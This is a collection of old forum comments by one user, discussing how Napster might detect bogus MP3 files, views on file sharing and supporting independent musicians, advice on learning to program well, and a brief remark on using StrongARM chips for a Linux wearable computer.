  3. Re:Exactly! on Do-It-Yourself Sue Napster Software · · Score: 1

No it's not. But I wonder if Napster advertises exact file sizes. If so, it would be pretty easy to determine if it's the real song, if the file size is within, say, ±1%. You could even download the first few K and have an alogrithm to determine if the data has an MP3 header (would have to handle ID3v2 also) and if it creates the same (once again within some small percentage) sonic "fingerprint." Someone would have to work fairly hard to make bogus files that would get around such a filter. I just don't think that would happen.

I'm all for Napster. I don't think I'm all for sharing someone else's copyrighted materials. Someone recently mentioned that these record companies are sharing our personal info without our consent, so I suppose I'm still on the fence with the major labels. I certainly don't think people should be putting stuff like Ani Difranco up there who is a true independent unless she says it's OK.

Myself, I write software for its own sake. From "The Tao of Programming:"

    Thus spake the master programmer:

A poorly written program is its own hell

Personally, I strive to be a better programmer so I can be a better programmer. I enjoy books like "The Pragmatic Programmer," "Programming Pearls," "Code Complete," and "The Essentials of User Interface Design." (and any of the gospels according to O'Reilly) I would recommend focusing on understanding and writing good software that solves a problem elegantly and well and not getting too bogged down in a particular technology. Instead of learning Java, for example, learn OO and see how you can apply it to Java. Don't memorize syntax and details. That's why The Buddha gave us bookshelves. Certainly, don't get bogged down in "This OS/tool/paradigm/language/editor is better than that one." Each of the ten thousand things is not the true way. The way is the true way.

Just remember to have fun and find the flow. That's what is the real reward, IMO: the flow.

These are some excellent points. At the same time, however, there is a vast difference between "Tom Dooley" and the like and the latest from, say Pizzicato 5 or Chemical Brothers. One could argue that the infrastructure that has grown up around the industry has fostered an explosion in the varieties of music being created and distributed. Without vinyl/tapes, would we have had The Beatles? Jimi Hendrix? The Sex Pistols? The Spice Girls? (Don't answer that last one!)

I don't know how that relates to music piracy. I don't use Napster because I think it's disrepectful to the artists I respect. I may not care about BMI/Sony/Warner/etc., but I know people like Ani DiFranco and Bruce Cockburn are out there bustin' ass just to make a living as relatively independent/obscure artists and I try to support them with my dollars when I have a few.

You should look at the StrongARM chip. Unless you want to run Windows, there's no need for x86 compatibility. Might as well go right for the lower-power ARM if you're running Linux.

Anyway, I think if this were possible, the folks at MIT's Wearable Computing Group would have done it already.
